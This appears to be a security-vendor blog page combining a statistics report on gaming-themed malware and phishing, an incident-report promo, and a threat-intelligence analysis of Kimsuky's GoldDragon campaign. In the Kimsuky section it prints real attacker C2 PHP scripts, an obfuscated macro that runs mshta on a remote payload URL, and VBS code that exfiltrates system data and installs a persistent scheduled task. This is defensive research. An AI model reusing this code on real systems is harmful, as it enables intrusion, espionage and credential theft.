The overall landscape of threats that affect gamers has not changed much since last year. Still, downloaders (88.56%) top the list of malicious and unwanted software being spread using the names of popular games: this type of unsolicited software might not be dangerous in and of itself, but it can be used for loading other threats onto devices. Adware (4.19%) comes second: this type of software displays unwanted (and sometimes irritating) pop-up ads which can appear on a user’s computer or mobile device.

The share of various Trojans that use popular games as a lure remains solid, with Trojan-SMS, Trojan-Downloader, and Trojan-Spy among the TOP 10 threats.

Threat Infection cases, % not-a-virus:Downloader 88.56 not-a-virus:AdWare 4.19 Trojan 2.99 DangerousObject 0.86 Trojan-SMS 0.49 Trojan-Downloader 0.48 not-a-virus:WebToolbar 0.47 not-a-virus:RiskTool 0.45 Exploit 0.34 Trojan-Spy 0.29

TOP 10 threats distributed worldwide under the guise of popular games, July 1, 2021 through June 30, 2022

Game over: cybercriminals targeting gamers’ accounts and money

When downloading the games from untrustworthy sources, players may receive malicious software that can gather sensitive data like login information or passwords from the victim’s device; and in an attempt to download a desired game for free, find a cool mod or cheat, gamers can actually lose their accounts or even money. The research revealed an increase in attacks using malicious software that steals sensitive data from infected devices. It included such verdicts as Trojan-PSW (Password Stealing Ware) which gathers victims’ credentials, Trojan-Banker which steals payment data, and Trojan-GameThief which collects login information for gaming accounts. From July 1, 2021 through June 30, 2022, Kaspersky security solutions detected a total of 6,491 users affected by 3,705 unique malicious files of these types. In the first half of 2022, we observed a noticeable year-on-year increase in the number of users attacked: 13 percent against the first half of 2021 (2,867 vs 2,533). The number of unique files used to attack users also increased in the first half of 2022 by nearly a quarter, compared to the first half of 2021: from 1,530 to 1,868.

From July 1, 2021 through June 30, 2022, 77% of various data stealer infection cases were Trojan-PSW infections. Another 22% of infection attempts were related to Trojan-Bankers, and Trojan-GameThief files accounted for just 1% of cases.

Types of malicious software that steals sensitive data from infected devices, distributed worldwide using popular game titles as a lure, July 1, 2021 through June 30, 2022 (download)

The TOP 3 threat families, stealing data from the infected devices, by number of attacked users from July 1, 2021 through June 30, 2022:

  • Trojan-PSW.MSIL.Reline/RedLine

    RedLine Stealer is a password-stealing software that cybercriminals can buy on hacker forums for a very low price. From July 1, 2021 through June 30, 2022 2,362 unique users were attacked by RedLine, spread by using popular game titles and series as a lure, which makes it the most active data-stealing malware family for the period given. Once executed on the attacked system, RedLine Stealer collects system information, including device user names, the operating system type, and information about the hardware, installed browsers, and antivirus solutions. Its main stealer functionality  involves extracting data such as passwords, cookies, card details, and autofill data from browsers, cryptocurrency wallet secrets, credentials for VPN services, etc. The stolen information is then sent to a remote C&C server controlled by the attackers, who later drain victims’ accounts.

    The RedLine code specifies that, depending on the configuration the malicious software can steal passwords from browsers, cryptocurrency wallet data, and VPN client passwords

  • Trojan-PSW.Win32.Convagent and Trojan-PSW.Win32.Stealer

    Both of these verdicts are generic verdicts for various families of malicious software that collect, analyze, and steal data from victims’ infected devices. From July 1, 2021 through June 30, 2022, 1,126 unique users encountered Convagent and 1,024 users encountered Stealer.

Most often, players get malicious software, stealing sensitive data, on their devices when trying to download a popular game from a third-grade website instead of buying it on the official one. For example, under the guise of a number of cracked popular games, attackers spread the Swarez dropper, which we analyzed in detail in our previous gaming-related threats report. Swarez was distributed inside a ZIP archive which contained a password-protected ZIP file and a text document with a password. Launching the malware resulted in decryption and activation of a Trojan-stealer dubbed Taurus. The latter had a wide range of functions: it could steal cookies, saved passwords, autofill data for browser forms and cryptocurrency wallet data, collect system information, steal .txt files from the desktop and make screenshots.

Attackers often purposely seek to spread threats under the guise of games and game series that either have a huge permanent audience (such as Roblox, FIFA, or Minecraft) or were recently released. We found that from July 1, 2021 through June 30, 2022, the TOP 5 game titles that cybercriminals used as a lure to distribute secret-stealing software included Valorant, Roblox, FIFA, Minecraft, and Far Cry.

Name Number of unique users affected Valorant 1777 Roblox 1733 FIFA 843 Minecraft 708 Far Cry 389

TOP 5 game titles used by cybercriminals to lure users into downloading malicious software, stealing secrets from infected devices, from July 1, 2021 through June 30, 2022

Risky money: how to lose instead of gaining

One of the most widespread cyberthreats gamers are exposed to is phishing, a social engineering scheme where an attacker masquerades as a legal and trustworthy entity to encourage the user to give out sensitive data, such as account credentials or financial information.

For the period from July 1st 2021 through June 30th 2022, Kaspersky security solutions detected 3,116,782 attacks connected to phishing activities in online games. One of the key findings in this segment was connected to the attacks aimed at gaining users’ credentials or taking over gaming accounts – especially through social network login.

For instance, we found several examples of phishing activity of this type targeting Grand Theft Auto Online gamers: the cybercriminals created a fake website that launched an in-game money generator. To use it, you have to login with your gaming account. Once the credentials are shared, the cybercrooks get access to such sensitive information as gaming account, telephone number, and even banking details.

A fraudulent money generator offered to GTA Online players

Offering easy in-game money to achieve phishers’ malicious goals was a noticeable trend in the previous reporting period and remains one. By mimicking Apex Legends, a multiplayer free-to-play hero shooter, scammers created a fake website that invited gamers to take part in a lottery to win in-game coins. To try their luck, players were asked to share their game credentials. Once the username or player ID alongside with password were entered, the account was taken over by the scammers.

The Fake Apex Legends website that invited players to take part in a giveaway of in-game coins. Once the player typed in their username and password, scammers got access to his account

This year, cybercriminals have learned to mimic the entire interfaces of the in-game stores for many popular game titles. The most notable examples include fake marketplaces launched under the names of CS:GO, PUBG and Warface, which are popular esports disciplines. To achieve better results, players need a decent arsenal of weapons and artifacts that are available in the in-game stores. The scammers created fraudulent stores by copying the appearance of the actual in-game marketplaces to fool players, with the final aim of taking over their accounts or stealing their money.

Fake CS:GO in-game stores created by cybercriminals

Scammers create fake in-game store mimicking the PUBG mobile interface. The scheme encourages users to log in using their social media credentials

Unsolicited mining: programs that ruin the gaming experience

Miners are programs that may adversely affect a computer’s productivity. Once a miner file is launched on an affected computer, it starts using the machine’s energy to mine cryptocurrency. When it comes to unsolicited miners that interfere with users’ operating systems against their will, the situation might get even worse – especially for gamers who value the computer’s productivity above all.

According to our analysis, Far Cry, a gaming series that spans 18 years and six editions, proved to be the most popular title among unsolicited miners – both in terms of affected users (1,050) and unique malicious files (510). Other games that make the perfect bait for miners include Minecraft with 406 unique files and Valorant with 93 files. Overall, from July 1st 2021 through June 30th 2022, we managed to detect 1,367 unique mining files which affected 3,374 users. That said, the number of users affected by miners halved in H1 2022 (1002) compared to H1 2021 (2086), which may be linked to the sharp drop in the bitcoin exchange rate. Interestingly, the number of unique miner files rose by 30% in H1 2022 (497) compared to H1 2021 (383).

Under the guise of one of the biggest novelties of 2022, cybercriminals have also distributed malware related to miners. The fantasy role-playing game Elden Ring was used as a lure by cybercriminals who spread OpenSUpdater. OpenSUpdater is a Trojan that pretends to be a cracked version of a game, and, once installed, downloads and installs various unwanted programs and miners to the victim’s device.

The OpenSUpdater campaign only targets users from certain countries, so if the user’s IP address does not satisfy the regional requirements of the distribution server, clean software will be downloaded, e.g., the 7zip archive manager. Less fortunate users will receive an installer that delivers various payloads, including legitimate software, potentially unwanted applications, and miners. Infection chain consists of two stages. At the first stage, a malicious downloader is installed. The code of this downloader is updated by threat actors several times a week by using various obfuscation and anti-emulation techniques. The main purpose of these changes is to complicate threat investigation and detection. The second stage is the installer itself.

Cheating in games, or being cheated?

Every gamer aims for the best performance and results – even when they are not competing for a precious trophy. This explains why cheating will never go out of style. However, some of the cheats can bring more harm than good.

What exactly are cheats? When we talk about cheats, we refer to the programs that help gamers create an advantage beyond the available capabilities by applying special cheat codes or installing software that allows sideways. Cybercriminals try to fool gamers by creating fake cheat programs which, instead of providing advantages, negatively affect computers’ performance or even steal player’s data.

From July 1st 2021 through June 30th 2022, we detected 3,154 unique files distributed as cheat programs for the most popular game titles, with a total of 13,689 users affected. The vast majority of the files mimicking cheat programs were related to Counter Strike: Global Offense (418), Roblox and Valorant (332 files for both), and Total War (284). At the same time, Need for Speed came first by number of unique users exposed to this type of threats (3,256) – this series of games has not lost in its broad popularity after several decades and generations.

Conclusion and Recommendations

The pandemic times greatly boosted the gaming industry, increasing the number of computer game fans several times over.

Despite the fact that the number of users affected by gaming-related threats has dropped, certain gaming threats are still on the rise. Over the past year, we have seen an increase in cybercriminal activity around stealers, which allow attackers to steal bank card data, credentials, and even crypto wallets data from infected devices. In the first half of 2022, we observed a noticeable increase in the number of users attacked by stealers, with a 13 percent increase over the first half of 2021.

We also analyzed which popular games were used as a lure by cybercriminals who distributed malware and unwanted software, and found that most often these were multiplayer gaming platforms, such as Minecraft and Roblox. Worryingly, the primary target audience for these games is children and teenagers, who have much less knowledge of cybersecurity due to a lack of experience. Because of this, we assume that they could become an easy prey for cybercriminals, which means we need to pay special attention to cybersecurity hygiene training for kids.

Traditionally, we have found a lot of different examples of phishing tools spread by cybercriminals to get access to gaming accounts, in-game items or money. Cybercriminals mostly created phishing pages that mimicked the appearance of the games whose users they were targeting. For example, we observed fake in-game stores for PUBG and CS:GO.

Over the years, the gaming industry has grown more and more, and we expect to see new ways of abusing users next year, e.g. by exploiting the theme of esports, which are now gaining popularity around the world. That is why it is so important to stay protected, so you do not lose your money, credentials, or gaming account, which you have built over the years.

Here is what we recommend to stay safe while gaming.

  • Protect your accounts with two-factor authentication whenever possible. At least comb through account settings if you cannot.
  • Use a unique, strong password for each of your accounts. Should one of your passwords get leaked, the rest of your accounts would remain safe.
  • You will benefit greatly from a robust security solution that will protect you from every possible cyberthreat without interfering with your computer’s performance while you are playing.  Kaspersky Total Security plays nicely with Steam and other gaming services.
  • Download your games from official stores like Steam, Apple App Store, Google Play, or Amazon Appstore only. While not 100 % safe, games from these stores undergo a screening process, which makes sure that a random app cannot be published.
  • If your desired title is not available from the official store, purchase it from the official website only. Double-check the URL of the website to make sure it is authentic.
  • Avoid buying the first thing that pops up. Even during Steam’s summer sale, make sure you read a few reviews before forking out the dough for a little-known title. If something is fishy, other people will have figured it out.
  • Beware of phishing campaigns and unfamiliar gamers. Do not open links received by email or in a game chat unless you trust the sender. Do not open files from strangers.
  • Carefully check the address of any website asking for your username and password, as it might be fake.
  • Avoid downloading cracked software or any other illegal content, even if you are redirected to it from a legitimate website.
  • Keep your operating system and other software up to date. Updates can help address many security issues.
  • Do not visit dubious websites when these are offered in search results and do not install anything they offer.
  • Use a robust security solution to protect yourself from malicious software on mobile devices, such as Kaspersky Internet Security for Android.
2022. szeptember 5.

The nature of cyber incidents

Kaspersky provides incident response services and trainings to organizations around the world. In our annual incident response report, we share our observations and statistics based on investigation of real-life incidents. The report contains anonymized data collected by the Kaspersky Global Emergency Response Team (GERT), which is our main incident response and digital forensics unit. Researchers from Europe, Asia, North and South America, Africa, and Middle East work on Kaspersky GERT.

Since 2020, when the COVID-19 pandemic forced organizations to switch to working from home, our services have adapted to the new normal. In 2021, 98% or our incident response services were provided remotely.

2021 in numbers
  • The majority of requests for incident response services came from our customers in Europe (30.1%), the CIS (24.7%), and the Middle East (23.7%).
  • Industrial (30.1%), governmental (19.4%) and financial (12.9%) organizations remain the most targeted ones.
  • In 53.6% of cases, exploitation of vulnerabilities in public-facing applications was the initial infection vector.
  • 51.9% of incidents were ransomware attacks, and in 62.5% of those cases, cybercriminals had had access to target systems for more than a month before they started file encryption.
  • In 40% of incidents, cybercriminals used legitimate tools.

More details on cyberincidents and response measures can be found in the full version of the report. It includes following information:

  • Review of 2021 trends
  • Reasons for organizations to suspect an incident and request response
  • Initial access vectors
  • Exploits and tools used by cybercriminals
  • Attack durations and response times
  • Recommendations on protection against the threats

To download the full report (in PDF), please fill in the form below. Note that if you have strict security settings enabled in your browser, you will need to add this page to exceptions to see the form.

MktoForms2.loadForm("//app-sj06.marketo.com", "802-IJN-240", 21782, function(form) { form.onSuccess(function(values, followUpUrl){ //Take the lead to a different page on successful submit, ignoring the forms configured followUpUrl. location.href = "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/02120838/Kaspersky-The-nature-of-cyber-incidents_v11-1.pdf"; //return false to prevent the submission handler continuing with its own processing return false; }); }); .googleRecaptcha { padding: 20px !important; } var GOOGLE_RECAPTCHA_SITE_KEY = '6Lf2eUQUAAAAAC-GQSZ6R2pjePmmD6oA6F_3AV7j'; var insertGoogleRecaptcha = function (form) { var formElem = form.getFormElem().get(0); if (formElem && window.grecaptcha) { var div = window.document.createElement('div'); var divId = 'g-recaptcha-' + form.getId(); var buttonRow = formElem.querySelector('.mktoButtonRow'); var button = buttonRow ? buttonRow.querySelector('.mktoButton[type="submit"]') : null; var submitHandler = function (e) { var recaptchaResponse = window.grecaptcha && window.grecaptcha.getResponse(widgetId); e.preventDefault(); if (form.validate()) { if (!recaptchaResponse) { div.setAttribute('data-error', 'true'); } else { div.setAttribute('data-error', 'false'); form.addHiddenFields({ reCAPTCHAFormResponse: recaptchaResponse, }); form.submit(); } } }; div.id = divId; div.classList.add('googleRecaptcha'); if (button) { button.addEventListener('click', submitHandler); } if (buttonRow) { formElem.insertBefore(div, buttonRow); } if (window.grecaptcha.render) { var widgetId = window.grecaptcha.render(divId, { sitekey: GOOGLE_RECAPTCHA_SITE_KEY, }); formElem.style.display = ''; } } }; function onloadApiCallback() { var forms = MktoForms2.allForms(); for (var i = 0; i < forms.length; i++) { insertGoogleRecaptcha(forms[i]); } } (function () { MktoForms2.whenReady(function (form) { form.getFormElem().get(0).style.display = 'none'; jQuery.getScript('//www.google.com/recaptcha/api.js?onload=onloadApiCallback'); }); })();
2022. augusztus 25.

Kimsuky’s GoldDragon cluster and its C2 operations

Kimsuky (also known as Thallium, Black Banshee and Velvet Chollima) is a prolific and active threat actor primarily targeting Korea-related entities. Like other sophisticated adversaries, this group also updates its tools very quickly. In early 2022, we observed this group was attacking the media and a think-tank in South Korea and reported technical details to our threat intelligence customer.

Kimsuky’s GoldDragon cluster infection procedure

In its new attack, the actor initiated the infection chain sending a spear-phishing email containing a macro-embedded Word document. Various examples of different Word documents were uncovered, each showing different decoy contents related to geopolitical issues on the Korean Peninsula.

Contents of decoy

The actor took advantage of the HTML Application file format to infect the victim and occasionally used the Hangeul decoy document. After the initial infection, a Visual Basic Script was delivered to the victim. In this process, the actor abused a legitimate blog service to host a malicious script with an encoded format. The implanted VBS file is capable of reporting information about infected machines and downloading additional payloads with an encoded format. The final stage is a Windows executable-type malware that is capable of stealing information from the victim such as file lists, user keystrokes, and stored web browser login credentials.

While researching Kimsuky’s novel infection chain, grouped as a GoldDragon cluster, we are faced with several limitations:

  • It’s not easy to acquire the next stage payloads during analysis of a multi-stage infection.
  • Even if we connect to the C2 server to acquire the payload, it’s hard to get a relevant response.
  • It’s not easy to figure out the connection between each object.

While tracking the Kimsuky group’s endless operations, however, we discovered server-side scripts related to the above infection chain. Based on this finding and further enriching it with data from our telemetry, we were able to reconstruct the whole operation methodology of this group. The Kimsuky group configured multi-stage command and control servers with various commercial hosting services located around the world. We can summarize the whole C2 operation as follows:

  1. The actor sends a spear-phishing email to the potential victim to download additional documents.
  2. If the victim clicks the link, it results in a connection to the first stage C2 server, with an email address as parameter.
  3. The first stage C2 server verifies the incoming email address parameter is an expected one and delivers the malicious document if it’s in the target list. The first stage script also forwards the victim’s IP address to the next stage server.
  4. When the fetched document is opened, it connects to the second C2 server.
  5. The corresponding script on the second C2 server checks the IP address forwarded from the first stage server to check it’s an expected request from the same victim. Using this IP validation scheme, the actor verifies whether the incoming request is from the victim or not.
  6. On top of that, the operator relies on several other processes to carefully deliver the next payload such as checking OS type and predefined user-agent strings.

C2 server structure

C2 script (download.php) for malicious document delivery

As a result of analyzing the server-side script to convey a malicious document, we figured out how this actor verifies the request from the client and minimizes exposure of their payload. This script works with a specific parameter name from the victim, so we suspect the actor delivers a download link to the victim via email or by sending a request using another type of payload.

  1. It checks the who GET parameter from the victim. The who parameter contains an email address without a domain name.
    if (isset($_GET['who']) && $_GET['who'] == "[redacted]") # Check 'who' parameter value { $vbs_server = "weworld59.myartsonline.com"; # The next stage server $virus = "v.doc"; # Malicious document $unvirus = "un.doc"; # Benign document $downname = "CV.DHOM Alexandra Siddall (Korean).doc"; # Delivered file name $who = $_GET['who']; $down = $who . ".txt";
  2. If the incoming request contains an expected email address, it saves the date, IP address and user-agent to the [who]_downhistory.txt file.
  3. If the user-agent contains Windows, which means the victim is a Windows machine, it goes to the next step. Otherwise, it delivers a benign document to the victim.
  4. Next, the script checks whether the connection from the victim is the first request or not by checking the existence of the [who].txt file.
  5. If the [who].txt file does not exist, it means it’s the first request from the victim, so the script forwards the IP address to the other server (VBS server), delivering the malicious document, saving the victim’s information to the [who].txt including date, IP address and user-agent.

Note that the script sends the victim’s IP address to the other server (named “VBS server” by the author). If the victim connects with an appropriate email address and if it’s an initial connection, the C2 script forwards the IP address to the specific servers with /index.php?ip= GET request. Sending the appropriate victim IP addresses to the remote server is a very important process for the operational security of this actor. We’ll look in more detail at how the operator uses this information in the next section.

function send_ip($host , $data) { $fp = @fsockopen("tcp://".$host, 80, $errno, $errstr, 30); if (!$fp) { } else { $out = "GET /index.php?ip=".$data." HTTP/1.1\r\n"; $out .= "Host: ".$host."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); fclose($fp); } }

Looking at the corresponding script (index.php) of the above IP-delivering GET request, here’s how it works. Once this script receives an IP address in the ip parameter of the HTTP request, it extracts the victim’s IP address from ip parameter and saves it to the allow.txt file. Otherwise, it saves the client information to the error.txt file and redirects the client to mail.google.com in this case. Additionally, the author used various legitimate websites for redirection, such as naver.com, kisa.or.kr, or other popular email services. The allow.txt file, which contains the appropriate victim’s IP address, is referred by another C2 script to verify whether the incoming request is valid and thus whether or not to deliver the next stage payload.

if(isset($_GET['ip'])){ $szfilename = "allow.txt"; $pfile = fopen($szfilename,"ab"); $res= $_GET['ip'] . "\r\n" ; fwrite($pfile,$res); fclose($pfile); exit; } $szfilename = "error.txt"; $pfile = fopen($szfilename,"ab"); $res= $date . "-" . "\r\n".$ip . "\r\n" . $_SERVER['HTTP_USER_AGENT']."\r\n"; fwrite($pfile,$res); fclose($pfile); header('Location: https://mail.google.com');

Also, we discovered that both malicious and benign documents are being delivered by this script. The operator maintains a pair of documents, one benign (un.doc) and the other malicious (v.doc), and delivers the appropriate one depending on the result of the victim verification step. The contents of decoy documents have various topics including the agenda of the “2022 Asian Leadership Conference”, a form of honorarium request and an Australian diplomat’s curriculum vitae. As we can see, the actor uses content the victim could be interested in, such as an event to be held in the near future, a specific request form, and the resume of a high-profile individual.

Decoy documents

Malicious document and method of delivering next stage payload

Malicious documents delivered to the victim contain a macro to fetch the next stage payload. The macro has a simple functionality and, interestingly, it spawns several child Windows command shells, probably intended for evading behavior-based analysis. Eventually, the macro executes a fetched payload with the mshta.exe process that is designed to execute a Microsoft HTML Application. The following scriptlet is part of a malicious macro in the document. It contains a remote server address to fetch the next stage payload.

cmd = "c" + "md /" + "c c" + "md /" + "c cm" + "d /" + "c c" + "m" + "d /" + "c c" + "md /" + "c c" + "md /" + "c msht" + "a.e" + "xe hxxp://leehr24.mywebcommunity[.]org/h.php" Shell cmd, 0 Sleep 9000 cmd = "cm" + "d /" + "c TAS" + "KKI" + "LL /" + "F /" + "IM msh" + "ta.e" + "xe" Shell cmd, 0

Luckily, we discovered the corresponding C2 script (h.php) from our telemetry. This script saves incoming traffic information to the log.txt file including the date, IP address, user-agent and the right-most 20 characters of the IP MD5 hash which is internally called “TID” (probably short for “Target ID”). Next, it checks the presence of the allow.txt file that contains IP addresses of verified victims. Only if the client’s IP address exists in the allow.txt, is the next stage payload, h.txt, delivered. Otherwise, the script delivers a short Visual Basic Script for terminating the mshta.exe process.

$downfile = "h.txt"; $logfile = "log.txt"; $allow_file = "allow.txt"; $handle = fopen($logfile, "ab"); fwrite($handle, $date ."\r\n" . $ip . "\r\n" . $_SERVER['HTTP_USER_AGENT']."\r\n"."id=".$TID."---------\r\n"); fclose($handle); if(file_exists($allow_file)){ $fp = fopen($allow_file,"r"); $content = fread($fp, filesize($allow_file)); fclose($fp); if(!stristr($content,$ip )){ echo 'Set objShell = CreateObject("Wscript.shell") objShell.run "TASKKILL /F /IM mshta.exe" , 0 , False'; exit; } }

VBS scripts from VBS Server

Allowing the macro in the malicious Word document to run leads the victim to fetch and execute an HTML Application (.HTA) payload. The fetched HTA file has two main goals: reporting the victim information to the C2 server and creating a scheduled task for auto-execution. The Kimsuky group tends to heavily reuse their code in various scripts; for instance, Visual Basic applications in macros, Visual Basic scripts and HTML applications.

The sent data contains the ProgramFiles folder path, antivirus name, recently opened file list, user name, OS name, OS version, Microsoft office version, .NET framework version, the file list from the Desktop folder, and a list of user-pinned taskbar items. When the script delivers the collected information to the C2 server, it uses /info.php?ki87ujhy= format, the Kimsuky group’s usual URL format for fingerprinting. Notably, it uses a hard-coded user-agent, including the intentionally misspelled word Chnome. After looking at the server-side script, we understand why they use Chnome and not Chrome.

ProgramFilesFolder = objShell.ExpandEnvironmentStrings("%ProgramFiles%") ProgramFilesx86Folder = objShell.ExpandEnvironmentStrings("%ProgramFiles(x86)%") drl = server_url + "/info.php?ki87ujhy=" + ProgramFilesx86Folder + "&rdxvdw=" + ProgramFilesFolder ..[redacted].. Post = "v=" + AntiVirusName + "&r=" + recentlist + "&un=" + UserName + "&os=" + os + "&sv=" + Version + "&msv=" + GetOfficeVersionNumber + "&dnv=" + dnv + "&dll=" + desktop_lnk + "&tll=" + taskbar_lnk Dim WinHttpReq Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0") WinHttpReq.Open "POST", drl, False WinHttpReq.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chnome/97.0.4692.99 Safari/537.36" WinHttpReq.setRequestHeader "Content-Type", "application/x-www-form-urlencoded" WinHttpReq.setRequestHeader "Content-Length", Len(Post) WinHttpReq.Send Post

Apart from the reporting capability, the fetched script downloads an additional payload and registers it with a persistence mechanism. This code is also heavily used in other Kimsuky scripts and fetches the payload through s.php, saving it to the defs.ini file, registering the file as a Windows schedule, with the name “OneDrive Clean” in this case.

Set shell_obj = CreateObject("WScript.Shell") ini_file = shell_obj.expandenvironmentstrings("%appdata%") & "\defs.ini" drl = server_url + "/s.php" Set WinHttpReq= CreateObject("MSXML2.ServerXMLHTTP.6.0") WinHttpReq.Open "GET", drl,False WinHttpReq.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chnome/97.0.4692.99 Safari/537.36" WinHttpReq.send If WinHttpReq.Status=200 Then Set oFile = CreateObject("Scripting.FileSystemObject") Set ofp = oFile.CreateTextFile(ini_file, 2) ofp.Write kjhskfjaskdjf(res) ofp.Close End If cmd1 = "w" + "sc" + "ript.e" + "xe //" + "e:v" + "bsc" + "ript //b """"" + ini_file + """""" cmd2 = "scht" + "asks /cr" + "eate /s" + "c mi" + "nute /mo 30 /tn ""OneDrive Clean"" /tr """ + cmd1 + """" shell_obj.run cmd2 ,0,False

During our research, we discovered a corresponding C2 script (s.php) for delivering a payload for auto-execution. The primary objectives of the delivered VBS payload are connecting to the legitimate blog, parsing the post and finally acquiring the next stage payload. Interestingly, this C2 script generates a blog address based on the victim’s IP address. After calculating the MD5 hash of the victim’s IP address, it cuts off the last 20 characters, and turns it into a blog address. The author’s intent here is to operate a dedicated fake blog for each victim, thereby decreasing exposure of their malware and infrastructure. Additionally, the script checks whether the user-agent has an uncommon string, chnome. As we mentioned earlier, the Visual Basic Script connects to this C2 script using a hard-coded chnome User-agent name and the script checks the misspelled user-agent to verify it’s an expected request from a real victim.

$filename = hash("md5" , $ip); $filename = str_replace("+" , "" , $filename); $filename = str_replace("=" , "" , $filename); $filename = str_replace("/" , "" , $filename); $filename = right($filename , 20); $logfile = $filename.".txt"; $errorfile = "error.txt"; if(stristr($_SERVER['HTTP_USER_AGENT'] , "chnome")) { $url = base64_encode("https://" . $filename . ".blogspot.com/2022/04/1.html"); $spy_script = 'Function hhgtttgffgg(ByVal base64String) On Error Resume Next Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" Dim dataLength, sOut, groupBegin

Based on our findings and analysis above, we list the tricks the actor adopts to hide their infrastructure and make it harder for security researchers and auto-analysis systems to acquire payloads:

Tricks from C2 scripts

Victims

Based on the contents of the decoy document, we hypothesize that the targets of this operation are people or entities related to politics or diplomatic activities. Also, historically, politicians, diplomats, journalists, professors, and North Korean defectors have been prime targets of the Kimsuky group. Based on the email address names from the C2 scripts, we can further consolidate this hypothesis. The C2 scripts have only partial email addresses, so we tried to extrapolate the full email address and real owner from within the diplomatic and academic spheres.

Email name Suspected email Delivered file name Email owner yk**** yk****@***.ac.kr unknown South Korean university professor lee**** lee****@gmail.com CV.DHOM Alexandra Siddall (Korean).doc Director General of South Korean government organization chon**** chon****@naver.com CV.DHOM Alexandra Siddall (Korean).doc Researcher at Defense Analyses woo****** Unknown CV.DHOM Alexandra Siddall (Korean).doc Think-tank researcher scc***** scc*****@naver.com CV.DHOM Alexandra Siddall (Korean).doc Researcher of think-tank won*** won***@****.ac.kr CV.DHOM Alexandra Siddall (Korean).doc South Korean university professor thk***** thk*****@naver.com CV.DHOM Alexandra Siddall (Korean).doc South Korean university professor kim***** kim*****@gmail.com CV.DHOM Alexandra Siddall (Korean).doc South Korean university professor kim*** Unknown 2022년AL(220412).doc
Asian Leadership Conference Probably former Korean Ambassador to the United Nations jh****** jh******@****.ac.kr [양식]사례비지급의뢰서.doc
([Template]Pay honorarium.doc) Professor of South Korea university jung****** jung******@gmail.com [양식]사례비지급의뢰서.doc Representative of Research Council for North Korea sung********* sung*********@gmail.com [양식]사례비지급의뢰서.doc Assistant professor at South Korean university Conclusions

Kimsuky, one of the most prolific and active threat actors on the Korean Peninsula, operates several clusters and GoldDragon is one of the most frequently used. We’ve seen that the Kimsuky group continuously evolves its malware infection schemes and adopts novel techniques to hinder analysis. The main difficulty in tracking this group is that it’s tough to acquire a full-infection chain. As we can see from this research, threat actors have recently adopted victim verification methodology in their command and control servers. Despite the difficulty of obtaining server-side objects, if we analyze an attacker’s server and malware from the victim’s side, we can get a full understanding of how the threat actors operate their infrastructure and what kind of techniques they employ.

Indicators of Compromise Malicious documents 238e6952a990fd3f6b75569feceb26a2 kima-2022-4-신정부의 외교안보전망-봉영식.doc edde6a385c86f60342831f24c3651925 kima-2022-4-신정부의 외교안보전망-봉영식.doc b6ba7e07b4867e4bd36dc9713744aedc kima-2022-4-신정부의 외교안보전망-봉영식.doc 7a3e966d30fe5d52cfe97d998e8c49cb kima_2022_4_신정부의_외교안보전망_봉영식.doc 596251e844abdaa77eeca905f0cb7677 v0412.doc ​​3fa45dcacf2193759086319c0d264341 CV.DHOM Alexandra Siddall (Korean).doc 75ae786fe89491dc57509801c212fa8b v.doc c0097cfa2e05ab1d18cf3dad93d98050 2022년ALC의제검토결과(220412).doc b80d15cbb729e6ca86e3b41924407c30 [양식]사례비지급의뢰서.doc 85f24b0f10b77b033e6e66ae8b7d55fc v.doc 40de99fb06e52e3364f2cd70f100ff71 5f38c57f83ee5d682ddf692442204fba b237b484c5c0fb020952e99b1134a527 심사논문.doc 96f5ef3d58a750a6db60f2e0566dc6e6 [극동연]한국 핵무장 관련 전문가 좌담회(계획).doc 3265b2d5e61971c43a076347fb405c4b 약력(양식).doc d9f2acfed7ede76f110334e2c572b74e 참고자료.doc CHM file c4a69dab3f8369d2f823c538590de345 KISA_ReadMe.chm Visual Basic Scripts 23b5811baa6cc9e562185571579ce5bc open.vbs 62b0fa29bcc317c59c5f5e7fd3a867bc KIMA_2022_4원고_봉영식.vbs 8bb7c8e8b723b02ffdcf6ff52444a810 2.vbs 8d28e28c1ee6f133441b6d71f7f8bcba open.vbs 32dda97cab8876215d771e398dd10f84 226f7677052f636a9a4f6e95b9e8b864 2c73cf2356a9005850fb2d07d024b2f2 f37afe7e072b26a2de22e16074f62294 bd0f789ace4def9196ce26588c3f41f8 a889a22d09286d71fb83fae5c0ff1c96 a87614a2c7c66c7f13f0b170e4837ede get_info.vbs 3361fa242eb7e6162fd4682471f4e952 get_info.vbs b18d2d4e77fc567306d406c75b75dc53 ea5c59741ff0ac27f45c4a9a508514c2 86b523d2f19e1628e8c74602a51ebff9 0a050b4239032ec76f1e244bceb435eb 07b2457f6e71d0b75693b6fecf9c88e7 e5682b7fb53cb478550df7f51bca6175 4433edb19f368e56d903a4ed0aa25a2e 72016ca15de6a0528fb9a9d0ac85d8b5 8b6d472fa9ec0023d7a35bdd7b8b2d4f 611c1a2771108730fde487bbb6d680d4 bb6662ed3f058a737674be6749c7e6f2 407fd3c14a19a6b682b0b7ecca0b0c8a 157e31eb70e2f28059f100f85317fcce 7cb5dca82ad330db0dde62a34ad3f692 7953f5b1ed7b0b0ac778a2d47f44195c c41f178a41aec6e7a28723ea70c3bd3b e4df8b86d669e1eb36add172972bcb27 20389c0e7f03e5df407ffcf5811eee09 desktop.ini e36cee3e23f3ab5557e547ce02b5bf3d desktop.ini ddf966990bc4bdb40b67b8eda0ae1fd7 desktp.ini beb6601397e208d2793aaa7be297b0f4 desktop.ini c791d7fc5216d4035825f4efb714ba0e desktop.ini 71def16f01ce0f57afe7b19c104a24e5 get_info.vbs HTML Applications a871511ef8abae9f103a3dfe77b12b6d j.hta c5ad15506ab05f054d547587111d6393 25eed4e06f9ed309331aaa6418ebd90d 809f60589ee8be7daf075446c2180eaa ksskdh.hta 5b5247ee7b43f51092ab07a1d1a31936 download.hta 8735788b2422c7ab910953178af57376 Windows executable payload 490b2496434e6a20dae758d0b6fc6e00 File list collector 56b5fec59e118ba324ccee8a336f7f12 Keylogger 56df55ef50e9b9c891437c7148a0764a Web Browser Password Viewer Server scripts 8289771e7eeffd28fb8a9e1bdeb3e86c dwonload.php dfb8d00ce89172bfc7ee7b73b37129a9 index.php 7fb868e6baf93a86d7a6a17ac00f4827 download.php Domains and IPs

Malicious document hosting servers:
